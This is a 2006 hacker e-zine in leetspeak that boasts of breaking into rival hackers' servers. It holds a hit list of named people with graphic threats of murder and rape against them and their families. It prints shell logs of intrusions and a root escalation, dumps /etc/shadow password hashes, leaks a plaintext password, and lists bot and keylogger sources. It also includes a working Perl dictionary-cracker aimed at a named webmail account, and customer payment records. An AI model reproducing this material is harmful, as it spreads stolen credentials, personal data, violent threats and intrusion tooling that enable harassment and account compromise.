#!/bin/rm-rf/yourself ########################################################### ## 0wn & rm 0wn & rm 0wn & rm 0wn & rm 0wn & rm ## ## ,-------------------------------------------------. ## ## >-------------------------------------------------< ## ## | -~- !Support!Zone-H!Support!HackThisSite! ~-~ | ## ## >-------------------------------------------------< ## ## | -~- Deface [secfocus|frsirt|milw0rm] ~-~ | ## ## >-------------------------------------------------< ## ## | -~- DDoS [*@efnet *@freenode] ~-~ | ## ## >-------------------------------------------------< ## ## | -~- Steal CC #s [and trade to us] ~-~ | ## ## >-------------------------------------------------< ## ## | -~- Trade xplz [on #darknet] ~-~ | ## ## >-------------------------------------------------< ## ## | -~- !Support!Morning_Wood!Support!Jeremy! ~-~ | ## ## >-------------------------------------------------< ## ## `-------------------------------------------------' ## ## The hardest zine to rool the scene. ## ########################################################### ##:::::::::::::::::::::::::::::0ur:4sc11:4rt1st:1z:d34d::## ##::::: ###:: ###: #########:::::::::s0:fuck:4sc11:::::::## ##::::: ###:: ### ###::: ####:::::::supp0rt:b4nt0wn::::::## ##::::: ###:: ### ###:: #####: ###::::::: #########::::::## ##::::: ######### ###: ## ###: ########: ###:::: ###:::::## ##::::: ###:: ### ### ##: ###: ###:: ### ###:::: ###:::::## ##::::: ###:: ### #####:: ###: ###:: ### ###:::: ###:::::## ##::::: ###:: ###: #########:: ###:: ###: #########::::::## ##::::::::::::::::HAPPY:EASTER:IRC:LAMERZ::::::::::::::::## ########################################################### ## b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3 ## ########################################################### ## root # ls -al /home/rattle/ ## ## total 32 ## ## drwx--x--x 4 rattle rattle 512 May 28 19:30 . ## ## drwx--x--x 254 root wheel 7168 Jun 15 07:07 .. ## ## -rwx--x--x 1 rattle scream2 771 Mar 13 18:00 .cshrc ## ## -rwx--x--x 1 rattle scream2 1 May 28 19:34 .history## ## drwx--x--x 2 rattle scream2 512 Apr 5 21:59 .irssi ## ## -rwx--x--x 1 rattle scream2 255 Mar 13 18:00 .login ## ## -rwx--x--x 1 rattle scream2 165 Mar 13 18:00 .login_c## ## -rwx--x--x 1 rattle scream2 371 Mar 13 18:00 .mail_al## ## -rwx--x--x 1 rattle scream2 331 Mar 13 18:00 .mailrc ## ## -rwx--x--x 1 rattle scream2 801 Mar 13 18:00 .profile## ## -rwx--x--x 1 rattle scream2 276 Mar 13 18:00 .rhosts ## ## -rwx--x--x 1 rattle scream2 852 Mar 13 18:00 .shrc ## ## drwxr-xr-x 2 rattle rattle 512 May 28 19:30 www/ ## ########################################################### ## echo 'h0no rux' > .sig ## ##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-## ## do yourself a favor and support h0no ## ##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-## ## scp ~/.sig root@undef.net:/root/ ## ########################################################### ## Z0N3-H!H4CKTH1SS1T3!4ND!H0NO!W1LL!D3STR0Y!Y0UR!B0X3Z! ## ########################################################### ## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ## ########################################################### ## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ## ########################################################### ## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ## ########################################################### ## 4R3!Y0U!R34DY!2!B3!H4Q3D???4R3!Y0U!R34DY!2!B3!H4Q3D?? ## ########################################################### ## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ## ########################################################### ## Z0N3-H!H4CKTH1SS1T3!4ND!H0NO!W1LL!D3STR0Y!Y0UR!B0X3Z! ## ########################################################### ## w4s th1nk1ng m4yb3 w3 sh0uld h4v3 4 d1ff3r3nt f0rm4t, ## ## m4yb3 m0r3 r3c1p3s 4nd h0w-t0s 1nst34d 0f unr3l4t3d ## ## 4rt1cl3s thr0wn t0g3th3r? ## ########################################################### ## 2006-~-2006-~-2006-~-2006-~-2006-~-2006-~-2006-~-2006 ## ########################################################### ## d0nt fuqn f0rg3t GSO! th3 f0rum w1th th3 m0zt h4ck3rz ## ## h4ck3rz th4t h4q! fuq 1r4n up! d3f4c3 4ll 0f th3m! ## ########################################################### ## MSG 10/23/04 at 02:32:56 PM AgntOrng (agntorng@hilary ## ## .duffs.bedroom) www.gmail.com l:radium.shells ## ## p:sha0lin ## ########################################################### ## H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R. ## ## agntorng 1z 0wn3d, 4ll 0f d4rp4 1n ru1nz, n0 0n3 ## ## th3r3 c4n h4q, x0rt suckz, 1z1k suckz, bl4cks3cur1ty ## ## b3tt3r w4tch th31r b4ckz, fuq 4ll y0u fuck1ng h4ck3rz ## ## wh0 d0nt tr4d3 w4r3z w1th uz. w3 g0t DDoZ 4 fr33 ## ########################################################### ## w3 fuq b0x3z up!!w3 fuq b0x3z up!!w3 fuq b0x3z up!! ## ## h0no3!!!-~-h0no3!!!-~-h0no3!!!-~-h0no3!!!-~-h0no3!!! ## ########################################################### 1TZ 2006, Y34R 0F TH3 H0NO H1TL1ZT ~-~-~-~-~-~-~ H0NO H1T L1ST [y0u d0 _n0t_ w4nt t0 b3 0n th1s!] -~-~- -~-~-~-~-~-~ 0wn3d h4ndl3 -~-~- -~-~-~-~-~-~ [x] di0ad [x] dvdman [x] tal0n/skew/bandit/luck0elduck [x] bx [x] morning_wood [ ] camel [ ] agntorng [ ] anyone from fuqn darpanet/iua who associates with above 2 -~-~-~-~-~-~-~-~-~ p30pl3 0n th1z l1zt n33d 2 f34r. th3z3 h1t l1zt b1tch3z c4nt h1d3 f0r3v3r. y0u b3tt3r fuck1ng ch4ng3 y0ur n4m3z 4nd m0v3 t0 4fr1c4.. c4us3 _W3_ _W1LL_ _FUCK_ _Y0UR_ _B0XEZ_ _UP_!_!_!_ ~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~ now why would you want to be on thiz list?? you do not want to be! h0no will fucking tear your life to fucking shreadz. w3 h4v3 3 truckl04dz 0f 0d4yz w1th a b0tn3t th3 s1z3 0f a 1st w0rld c0untry. w3 h4v3 m1ll10nz 0f CC #'z. w3 w1ll p4y 0ff assassi4nz. w3 h4v3 m0b c0nn3ct10nz t1ght3r th4n p3ng0. y0u w4nt t0 fuq1ng d13? y0u w4nt y0ur l1f3 t0 3nd b3c4uz3 0f y0ur d0rky 0nl1n3 1rc ch4tz? st3p th3 fuck up. m3nt10n h0no, y0u w1ll b3 0wn3d. th1nk 4b0ut d1zz1ng us 4nd y0u w1ll b3 k1ll3d. thr04t sl1t! try t0 1d3nt1fy us 4nd I w1ll F1ND Y0UR F4M1LY 4ND K1LL 3V3RY L4ST 0N3 0F TH3M!@# R4P3 & MURD3R Y0UR M0TH3R. BL00D, PUZZ, & CUM 0ZZ1NG 0UT 0F H3R FUCK1NG CUNT. D0 N0T! D0 N0T! D0 N0T FUCK W1TH H0NO! ~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~ 1F 4NY0N3 0F Y0U TH1NK 1TZ 0V3R.. 1T 1Z N0T. Y0UR L1F3Z 4R3 F1N1SH3D! Y0U H4V3 FUCK3D W1TH WR0NG GR0UP 0F CR1M1N4LZ. FUCK1NG D34D. W3 W4NT Y0U 0FF TH3 1NT3RN3T, W3 W4NT Y0U 0FF TH3 PL4N3T. W3 _W1LL_ F1ND Y0UR 1NF0, W3 _W1LL_ FUCK1NG CRIPPL3 Y0U. 1T 1Z 4 PR0M1Z3. ~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~ [ARGH!@# I AM S0 M4D I BROK3 MY K3YB0ARD 0V3R MY H34D.] -1.txt Intr0dukti0n 00.txt -~-~-~ s0rry silent, y0ur 0wn3d 01.txt -~-~-~ konewka roSUCKZ 02.txt -~-~-~ ri0t c0d3z 03.txt -~-~-~ sabre-security 04.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 1 (esser) 05.txt -~-~-~ tal0n g3tz h4x up! 06.txt -~-~-~ k33p1ng 0d4y s4f3 (th3 v3rs10n phC n3v3r w4nt3d y0u t0 s33!!) 07.txt -~-~-~ g0tfuq3d, g0t0wn3d, g0tn00d4yz4h0not0st34l... 08.txt -~-~-~ N3V3R 0WN3D!! rave. N3V3R 0WN3D!! 09.txt -~-~-~ 3th1cz@exploits.cx 10.txt -~-~-~ ethics@idefense.com 11.txt -~-~-~ 0day iCER r4pz 12.txt -~-~-~ core-sdi b1t3z th31r t0ngu3. 13.txt -~-~-~ 1f b4b0 c4nt h4q th3m.. 14.txt -~-~-~ majestic 4x3d. 15.txt -~-~-~ a pr0p0s4l 4 3b4y3rz 16.txt -~-~-~ kf g03z br0k3 17.txt -~-~-~ d4rp4n3t/d1s.0rg fuqt4rd s31z3d 18.txt -~-~-~ h3llm4n c4nt 4dm1n 19.txt -~-~-~ ptp un3th1c4l h4ck1ng 20.txt -~-~-~ how hack in pc 21.txt -~-~-~ di0ad 1z t04zt3d 22.txt -~-~-~ 0wlm4n4tt r3s1gnz 23.txt -~-~-~ nc/rx 0wn3d t0 fuq 24.txt -~-~-~ th3 f41l3d corestorm t34m. 25.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 2 (kunz) 26.txt -~-~-~ 4ud1t1ng th3 h4q3rz m1nd 27.txt -~-~-~ DVDMAN 1Z A FUQN FR34K!!@# 28.txt 0utr0 -1.txt -~-~-~ Intr0dukti0n h0ly fuck1ng sh1t d1vin31nt! We g0t s0m3 w4r3z. 1tz t1m3 t0 us3 th3m. w3 s3r10uzly c0nc1d3r3d qu1t1ng h4ck1ng, but w1th0ut us wh0 w0uld rm y0u? wh0 w0uld DoS y0u? wh0 w0uld tr4d3 y0ur CC #s? Th1ngz 1n d4rkn3t h4v3 cr4wl3d t0 4 gr1nd1ng h4lt. n0 0n3 1s sh4r1ng th31r w4r3z 4nym0r3, s0 w3 h4d t0 m0v3 t0 4lt3rn4t1v3 m34nz t0 g3t th3 0d4y. th4nk g0d f0r b4nt0wn. w3'v3 h1t th3 j4ckp0t 4nd us3d 4ll 0f 0ur p4yp4l and CC #s t0 purch4s3 s0m3 gr4d3-A w4r3z fr0m A z0ne-h fr13nd 4nd w3 3v3n h4d th3 w1nn1ng b1d f0r 4n 3xc3l 0d4y unt1l 3b4y turn3d 1nt0 puss1ez. gu3zz w3 w1ll h4v3 t0 fuzz s0m3m0r3 t0 m4k3th3 y34rly qu0t4. ~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~ 0n 4 t0t4lly d1ff3r3nt subj3ct, tw0 m0r0nz wh0 c4nt c0de (agntorng & camel - rm 0n s1ght), y3t t4lk m0r3 sh1t th4n 1f n3td3v & 4ll m3mb3rz 0f b4b0 c0mb1n3d 1nt0 0n3 sup3r f3c3z-b4b3l-spr4y1ng m4ch1n3, 4r3 runn1ng 4r0und l1k3 s0m3 un3mpl0y3d w1r3d.c0m 3d1t0rz st4rt1ng sh1t 4ll 0v3r th3 pl4c3. th3y kn0w w3 g0t th31r 1nf0z, th3y kn0w w3 g0t th3 w4r3z, th3y kn0w th3y 4r3 d3f3ns3l3zz. th3n why w0uld 4ny0n3 w4nt t0 st3p up t0 us?? fuck w1th h0no 4nd y0u w1ll g3t d3lt w1th. 1t 1s pr0b4bly b3tt3r f0r y0ur b0x 1f y0u d0nt 3v3n r34d th1s z1n3. 00.txt -~-~-~ s0rry silent, y0ur 0wn3d ircd@box187 ~ $ cat sn1ffl0g | grep \|silent :d4rkgr3y!~phear@217.107.223.43 PRIVMSG FoxTrot- : |silent is m00 member y0u truzt y0ur m3mb3rz d4rkgr3y? l3tz s33.. -------------------------------------------------------------------------------- 18:53 <|silent> btw! there is a group outta there who own boxes from security-team-ppl 18:53 <|silent> 2 m00 ppl already got owned and one teso guy got owned 18:53 <|silent> i know all the 3 ppl! 18:54 <|silent> i'm a bit scared they seem to be good i just hope they wont take my server :/ 18:54 <|silent> check http://h0h0.com/h0no.txt 18:54 <|silent> search for silent in the document 18:55 heh, nice :P 18:55 they wont manage it :P 18:55 ill read it, i just fix the mail stuff first 18:57 <|silent> okay :) 19:00 seems to work ;) 19:00 <|silent> :D 19:01 hmmm 19:01 which box is that ? 19:01 drwx------ 2 rob rob 512 Sep 19 19:06 rob 19:01 drwx------ 2 silent silent 512 Sep 20 06:16 silent 19:02 <|silent> it was the box from a m00 teammate 19:02 ok :P 19:02 <|silent> from a fucking good security guy also! so i'm a bit scared ;/ 19:03 <|silent> http://reflux.dyndns.org/ 19:03 lol, they write like fucking script-kiddies :P 19:03 ok 19:03 <|silent> lol 19:03 if they manage to get your root password it is no problem to root it 19:03 else it's HARD 19:03 i don't think they will manage to do so 19:04 since you use random return addresses 19:04 most exploits require a pre-defined return address to occour to work 19:04 <|silent> yea but.. they don't use bruteforce shit.. as the hono file say ;/ 19:04 atleast overflow exploits 19:04 <|silent> they use useraccounts and gain root with it 20:20 but remember i'll add m00 and priv8 ppl 20:20 then we'll degrade 20:20 grrr 20:20 fuck :P 20:20 hahaha :D 20:20 i add all the coder :D 20:20 hahaha :P 20:20 so we can take their sources and advisories :D 20:20 you've talked to them ? 20:20 yep 20:20 yep :P 20:21 i announced in m00 members page that i'll got a server for the coders :) 20:21 then we root fbi.gov 20:21 hahaha 20:21 not from my server :D 20:21 i will :P 20:21 but we have to think about something which copy all new downloaded files to a special folder ;D 20:22 so that we can get it later :p 20:22 and we have to manipulate w and who so that ppl just see their own processes 20:22 ehrm 20:22 own connections -------------------------------------------------------------------------------- -~-~-~QOUTE-~-~-~ "so i'm a bit scared" - |silent -~-~-~QOUTE-~-~-~ digitaljunk:~$ uname -a; id Linux digitaljunk 2.6.11.9-grsec-digitaljunk #2 Tue May 31 19:42:12 CEST 2005 i686 GNU/Linux uid=1000(silent) gid=100(users) Gruppen=100(users) digitaljunk:~$ cd Maildir/new/ digitaljunk:~/Maildir/new$ cat 1117650803.V302I40e229M467122.localhost.localdomain Return-Path: X-Original-To: silent@oral-sex.bz Delivered-To: silent@oral-sex.bz Received: from ns30617.ovh.net (ns30617.ovh.net [213.186.47.153]) by mail.digitaljunk.de (Postfix) with SMTP id 508F11AF2EE for ; Wed, 1 Jun 2005 20:33:23 +0200 (CEST) Received: (qmail 24578 invoked by uid 99); 31 May 2005 09:32:46 -0000 Date: 31 May 2005 09:32:46 -0000 Message-ID: <20050531093246.7663.qmail@ns30617.ovh.net> To: silent@oral-sex.bz Subject: [Exploits] Microsoft Windows Exploit (MS05-012), Zeroboard 4.x "preg_replace" Exploit From: FrSIRT Alerts X-Sender: Mime-Version: 1.0 charset=ISO-8859-1 Content-Transfer-Encoding: 7bit ---------------------------------------------------------------------- FrSIRT / Exploits and Codes ---------------------------------------------------------------------- The French Security Incident Response Team 24/24 & 7/7 ---------------------------------------------------------------------- - 31 May 2005 - ---------------------------------------------------------------------- - Microsoft Windows COM Structured Storage Local Exploit (MS05-012) http://www.frsirt.com/exploits/20050531.SSExploit.c.php - Zeroboard 4.x "preg_replace" Remote Command Execution Exploit http://www.frsirt.com/exploits/20050531.zeroboard.c.php ---------------------------------------------------------------------- Copyright © 2002-2005 - FrSIRT.COM ---------------------------------------------------------------------- ################################################################# ## y0u w1ll n33d m0re th4n 0ld w4r3z t0 b3 s4f3! ## ################################################################# digitaljunk:~/Maildir/new$ cd digitaljunk:~$ cd coding/ digitaljunk:~/coding$ ls * cokebot: bf_tab.h blowfish.c blowfish.h cocain cokebot.c Makefile dev-files: blowfish-dev mysql-dev done: kaiten.c keyloger.c libirc.tar.gz uingen.c php: bleattern.php getfiletime.php nospam.php random_pass.php upload.php urlvalid.php validate_mail.php samples: fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c digitaljunk:~/coding$ head -n54 cokebot/cokebot.c /* ****** PRIVATE EDITION ****** * * * cokebot v.0.5 beta * * © 2004 by |silent * * * ***************************** Changelog: 08.11.2004 + added reconnect feature! Changelog: 03.11.2004 + added part command + added restart command (beta! too lazy to fork() ;D will do it soon!) Changelog: 02.11.2004 + added static login (eh? missing part cmd see TODO) + added chanlist (beta! chan/chankey support done!) + added userlist support + replaced join/op/deop/die/whoami commands for user-support + added userlist with authlevel + added support for older gcc Changelog: 01.11.2004 + rewrote command system + radnom nick/user/ident + updated conn() + added nick system (completation etc..) + blowfish cryption (beta) + segfault on quit fixed + fixed segfault on non-existing sites.conf Changelog: 31.10.2004 + radnom nick/user/ident + replaced sendtotarget() + static server/port + added commandlist by char TODO: - use linked lists for chans - restart fork() - better blowfish implementation - doconf() to create conf-files if non exist - crypted userlist - crypted chanlist - add modes etc.. to chanlist - sitemanager - admin control to modify chans/user - useradd - evilmode - hidden process - shellcommands */ digitaljunk:~/coding$ head -n5 done/keyloger.c /* Simple Keyloger - by |silent */ digitaljunk:~/coding$ head -n22 done/uingen.c #include #include void welcome() { printf("[-] UINGen by |silent\n"); printf("[-] (c) 2004 |silent\n"); printf("[-] Contact: silent@oral-sex.bz\n"); printf("[-] Website: http://blackhat.tv\n"); } void usage() { printf("[-] Usage: ./uingen -f -l [-po]\n"); printf("[-] Scan-Example: ./uingen -f 500000 -l 550000 -p test123 -o uinlist.txt\n"); printf("[-] Single-UIN Example: ./uingen -s 123123123 -w word.lst -o brutelist.txt\n"); printf("[-] -f First UIN\n"); printf("[-] -l Last UIN\n"); printf("[-] -s Single UIN/Wordlist Mode [-w required]\n"); printf("[-] -w Wordlist [for single UIN mode only]\n"); printf("[-] -p Password [default: password]\n"); printf("[-] -o Outfile [default: outfile.txt]\n"); exit(1); } digitaljunk:~/coding$ ls samples/ fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c ################################################################# ## ~-~Wh3r3 4r3 th0s3 c0d3z......?? ## ################################################################# digitaljunk:~$ cd htdocs/ digitaljunk:~/htdocs$ ls 213.239.211.98 digitaljunk.de greyhat.co.uk oral-sex.bz digitaljunk:~/htdocs$ ls digitaljunk.de/content/vidz afterhour-part1.avi silent_owned.wmv digitaljunk:~/htdocs$ ls digitaljunk.de/content/coding/exploits/ ################################################################# ## ~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~ ## ################################################################# digitaljunk:~/htdocs$ ls digitaljunk.de/content/coding/sources/ agobot3-0.2.1-pre4-priv.rar blow BlowSXT.rar connectback.pl hookbot.tgz kaiten.c libirc.tar.gz mysql pftp-src.0.11.4.tgz shijack.c sock.c uingen.c digitaljunk:~/htdocs$ cd digitaljunk:~$ ./h00p1tup digitaljunk:/home/silent# id uid=0(root) gid=0(root) Gruppen=0(root) digitaljunk:/home/silent# cd digitaljunk:~# ls allsql.sql candicrew_home.tgz cyrus-imapd-2.2.12.tar.gz db-4.3.28 ebba_home.tgz oidentd-2.0.7 pam_mysql-0.5.tar.gz procmail-3.22 video.asp?video=V8-Chainsaw awstats-6.5.tar.gz cybersoft_inkasso_home.tgz cyrus-sasl-2.1.21 db-4.3.28.tar.gz install-report.template oidentd-2.0.7.tar.gz postfix-2.1.6 procmail-3.22.tar.gz waterguide_home.tgz awstats-6.5.tar.gz.1 cyrus-imapd-2.2.12 cyrus-sasl-2.1.21.tar.gz dbootstrap_settings Mail pam_mysql postfix-2.1.6.tar.gz vhosts.conf.backup webmin-1.200.tar.gz digitaljunk:~# cat /etc/shadow root:$1$T6gE9w0/$vo/dIs7jK7CP2lr.aRtMx/:12934:0:99999:7::: daemon:*:12893:0:99999:7::: bin:*:12893:0:99999:7::: sys:*:12893:0:99999:7::: sync:*:12893:0:99999:7::: games:*:12893:0:99999:7::: man:*:12893:0:99999:7::: lp:*:12893:0:99999:7::: mail:*:12893:0:99999:7::: news:*:12893:0:99999:7::: uucp:*:12893:0:99999:7::: proxy:*:12893:0:99999:7::: www-data:*:12893:0:99999:7::: backup:*:12893:0:99999:7::: list:*:12893:0:99999:7::: irc:*:12893:0:99999:7::: gnats:*:12893:0:99999:7::: nobody:*:12893:0:99999:7::: Debian-exim:!:12893:0:99999:7::: sshd:!:12893:0:99999:7::: mysql:!:12893:0:99999:7::: silent:$1$72YyIyox$67vyj7jfLUWeFYA24dWOl1:12934:0:99999:7::: breath:!:12934:0:99999:7::: upload:$1$gVq9vOrJ$qrQgeXNVHjX.FFi4xhK9K/:12934:0:99999:7::: hillside:$1$gfXquKfq$mWkMvMvKY3sck.PJstZqp0:12934:0:99999:7::: bind:!:12934:0:99999:7::: tuborg:$1$lhO4VKnt$yx9/34El7HK5m5KS5jUFe/:12934:0:99999:7::: cyrus:$1$mk7JsS6t$/lGzf9WhyOT9ZdotH.ajN.:12934:0:99999:7::: postfix:!:12934:0:99999:7::: dovecot:!:12935:0:99999:7::: tech:$1$SYf8xzC/$enjJt2k9hqxdxiUogdD3D/:12935:0:99999:7::: marius:$1$mtWc/oSj$czow9rYQcy3EPrtRfTQHX0:12935:0:99999:7::: jonas:$1$i9wTlJ7r$4TbucpQL.uG6RmDgkq9uP.:12936:0:99999:7::: bjerkis:$1$Z8TcITtK$KvOghtp2AYJCQLogkHovh1:12936:0:99999:7::: ################################################################# # QOUTE ~-~ "18:55 they wont manage it :P" ~-~ QOUTE # ################################################################# Th4nkz t0 |s1l3nt f0r st34l1ng pr1v4t3 c0d3z fr0m h1z t34m-m4t3z (m00 & priv8sec) & f0r l3tt1ng us t4k3 1t s0o0o e4s1ly! w4tch f0r silent_owned2.wmv t0 dr0p. Whois silent? 08:34 -!- |silent [silent@divinity-38478E7B.de] 08:34 -!- ircname : h0no I've been owned! 08:34 -!- channels : @#darpa @#m00 @#teengaysex 08:34 -!- server : irc.blackhat.ru [m00 IRCd] 08:34 -!- : is a Secure Connection 08:34 -!- idle : 0 days 2 hours 15 mins 34 secs 08:34 -!- End of WHOIS 01.txt -~-~-~ konewka roSUCKZ konewka fr0m roSEC g3tz 4x3d, m4yb3 h3 sh0uld sp3nd m0r3 t1m3 th1nk1ng up a b3tt3r p4zzw0rd r4th3r th4n tr4d1ng cr3d1t c4rdz 4nd sh1tty s0urc3. 1t 0nly t00k hydr4 a 200kb d1c t0 cr4q h1z p4zz. h1z c0d3z 4r3 m0r3 p01ntl3zz th4n a hwa-security r3l34z3. login as: konewka konewka@83.23.44.188's password: Last login: Wed Sep 20 23:10:59 2005 from h.0.n.o + Welcome aboard + konewka@olek:~$ uname -a;id Linux olek 2.4.30-ow3 #1 Tue Sep 13 18:45:51 CEST 2005 i686 unknown uid=1000(konewka) gid=100(users) groups=100(users),10(wheel) konewka@olek:~$ ls -al total 3772 drwx-----x 14 konewka users 4096 Sep 17 18:03 . drwxr-xr-x 5 konewka users 4096 May 24 15:28 .. -rw------- 1 konewka users 6173 Sep 20 16:20 .bash_history drwx------ 3 konewka users 4096 Sep 4 12:34 .gg/ drwx------ 3 konewka users 4096 Oct 29 2004 .irssi/ drwxr-xr-x 3 konewka users 4096 Sep 14 14:39 .mc/ drwx------ 2 konewka users 4096 Aug 22 15:59 .screen/ -rw-r--r-- 1 konewka users 3394 May 5 2004 .screenrc drwx------ 2 konewka users 4096 May 30 2004 .ssh drwx------ 4 konewka users 4096 Apr 10 15:07 b0x/ -rw-r--r-- 1 konewka users 205 Aug 13 22:10 clear_dict.pl -rwxr-xr-x 1 konewka users 12224 Aug 8 22:13 mcrack drwxr-xr-x 10 konewka users 4096 Mar 16 2005 meggdrop drwxr-xr-x 2 konewka users 4096 Aug 9 22:28 mgg_hijack drwxr-xr-x 2 konewka users 4096 May 23 2004 mlamebot -rwxr-xr-x 1 konewka users 621 Aug 13 01:54 mmcrack.pl drwxr-xr-x 2 konewka users 4096 Aug 10 2004 n0f -rw-r--r-- 1 konewka users 571856 Aug 12 19:35 mperl5.zip -rw-r--r-- 1 konewka users 2154218 Aug 13 01:56 polish -rw-r--r-- 1 konewka users 1022183 Aug 13 22:09 polish.clear -rwxr-xr-x 1 konewka users 1498 Jan 8 2005 relay.pl drwxr-xr-x 2 konewka users 4096 Aug 11 20:02 smb_h03 -rw-r--r-- 1 konewka users 21 Jul 22 22:07 temporary drwxr-xr-x 2 konewka users 4096 Aug 3 21:57 w0rkz konewka@olek:~$ head -n4 relay.pl #!/usr/bin/perl -w # relay.pl C-class smtp relay scanner by konewka # use ./relay.pl 2> relay_servers to log only smtps with relaying. # This is edu purpose only. enjoy konewka@olek:~$ cat mcrack.pl #!/usr/bin/perl -w use Net::POP3; # setup my $host = "poczta.onet.pl"; my $user = "malgosia181"; my $dict = "polish"; print "mrack.pl by konewka\n"; open(WORDLIST, $dict); $pass = ; $| = 1; while ($pass ne "") { $pop3 = Net::POP3->new($host); die "Can't connect !" unless $pop3; $pass = substr($pass, 0, length($pass)-1); $cracked = $pop3->login($user, $pass); if (defined($cracked)) { print "\nCracked ! Password = ".$pass."\n"; $pop3->quit(); close(WORDLIST); exit 1337; } else { print "."; } $pass = ; } printf "I guess nothing was cracked this time.\n"; konewka@olek:~$ cd .ssh konewka@olek:~/.ssh$ cat known_hosts 192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtZ8HOFBxujq/T3Mnnv2uGAdSdu6eERdVMiUlwJzmwuyzPgAn/taXzPfMgCLM9QfEBzuc1K20+h1jn0MPPGavQfmuBcShz+zPSUA3IAbqjyUvHtO+J3ODDweDl2wy3qGefrBAhlTSQTphjb/cKRO3PLztHd2qM14xB1svC8WU81c= rosec.segfaulted.com,80.97.66.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0hwGICbJvrIfgezT5j4RtAF1cW0sWmRxr5Ym21pHg4Bn7ujHXdogSQJenI6GeJ4q2FI4mfVVui+Ce7VKKZs3YYeR/lIvbJh5p6cjjmw2oJyIMjp3dsRd3QZnM1IrDt9tZCVyHWALwT2GyH7sFwS5YiqQczBvPUcssEx1+//z3r0= ffs.ath.cx,82.224.195.151 ssh-dss AAAAB3NzaC1kc3MAAAEBAKj6I/LFVpofk3d9f65Cr/CjViVBA64+aaIfSk2h0Shz09TT4SdSLpDh6uMh2UX+SX/4pMq3ke2tmUzY7NYt6ZhOge7sOgsIF0S/bRFyGO25Ow58AWPDTk4Z/B93wSc31gE+oiLi9fIrt0JJwTEbswQgmMjnGjiV9QB0OB1XbevgfTBtsxc+DtbuXAWsA9/JWthIXf3UlgHj20hRpTgp4q6r00bD0efmSbyqWq0U+rTKHS8dFAnLiRrvfkLzkToDjdffr/MFj9gJI+Z04Aki25KzgFW4i2imep5foq08/9zanOQ/OMSfW6tdEXGBLUXJQhEOUUUGHvXuPaTnGHOktbsAAAAVAKLGZ4KLasiL6g8XJ0msw56RckzZAAABAEBsfr3TR7l1Ld7PWc7+o/02rE+INHk/hTomKc6tizNo0bF7W1IvjnmX6q17Tj8M1rV6/I1QpYMcfCNC7UZhoMmq//8lum02v+k1LXNjbV+R85V9hYkPYfqzEHpER4hwo/aqelzV9/gVLRxYurRdKg2DqOHEwV/BlKpk/hL0NYsA3RHPdomsQmqBtAYiPeDGUkI3l7lTLO+Vnvhp00Re4KcNzrYsWp3aCF+JcqJ5w8VPJEgoWQI76p7PW5Croaaiebh3d7Mn92wCSaaL0+W3JxY0ZFijJPSFEQQYjrLfASC+a3yi/em8MeAaBc4OrC+Lod7SQHz2AfsdRwAtEYwIfPcAAAEBAIJVSztDyUD8BHUfSfN1yV1vVDcMYY98wpDmluDRO1PEGnGB81y/HJKATKU8VXd7xxJFlhQL92HVohu5Fcz3WiPtZGNw2bcZJ0+s+1ormLgmgcBeWIIG79anXi+JBUugjaf1fzviRmcwChRLU6ameKFWDv4GNW3u4XQEQheN4XbLKhIFT774cFtadTFB4qRTxyh/qOyw6eeW6RzjCaHydVgTY8PzffU13yyoKwsb8MZz9W3G3cicsbZCUKcSPs5OZ8Z9kp4uz4lwAWcoaz8zVlAjxLy62PObmb40qSaLfHUKvvxNs5EQEqirr/wtxpdpPDaiYDaggYECgwYJ6k/11/k= konewka@olek:~/.ssh$ cd .. konewka@olek:~$ cat /etc/passwd root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucppublic: nobody:x:99:99:nobody:/: sshd:x:33:33:sshd:/: konewka:x:1000:100:***********,,,:/home/konewka:/bin/bash free:x:1005:100:FTP,,,:/home/free:/bin/false konewka@olek:~$ cd b0x konewka@olek:~/b0x$ ls mcux.txt gwee-1.36 m0d.txt matrix.txt mod.pl ns/ tar.tar.gz konewka@olek:~/b0x$ cat cux.txt First Name Jim Last Name [edited] Address [edited] City [edited] State NC Post Code [edited] Email [edited] Phone [edited] Payment Information Payment Type Visa Name on Card James [edited] Card Number [edited] Expiry Date mm/yy [edited] Card Holder Address [edited] Authorization CVN [edited] Shipping Information Shipping Method Ground Weight=10.1499999761581 First Name Dana Last Name [edited] Address [edited] City [edited] State OR Post Code [edited] Country US Email [edited] Phone [edited] Payment Information Payment Type Visa Name on Card [edited] Card Number [edited] Expiry Date mm/yy [edited] Card Holder Address [edited] Authorization CVN [edited] Shipping Information Shipping Method Next Day Air Weight=8 Ship to Name [edited] Ship to Address [edited] Ship City [edited] Ship State IN Ship Post Code [edited] Ship Country US Customer Information First Name Marlene Last Name [edited] Address [edited] City [edited] State TN Post Code [edited] Country US Email [edited] Phone [edited] Payment Information Payment Type Visa Name on Card Marlene [edited] Card Number [edited] Expiry Date mm/yy [edited] Card Holder Address [edited] Authorization CVN [edited] 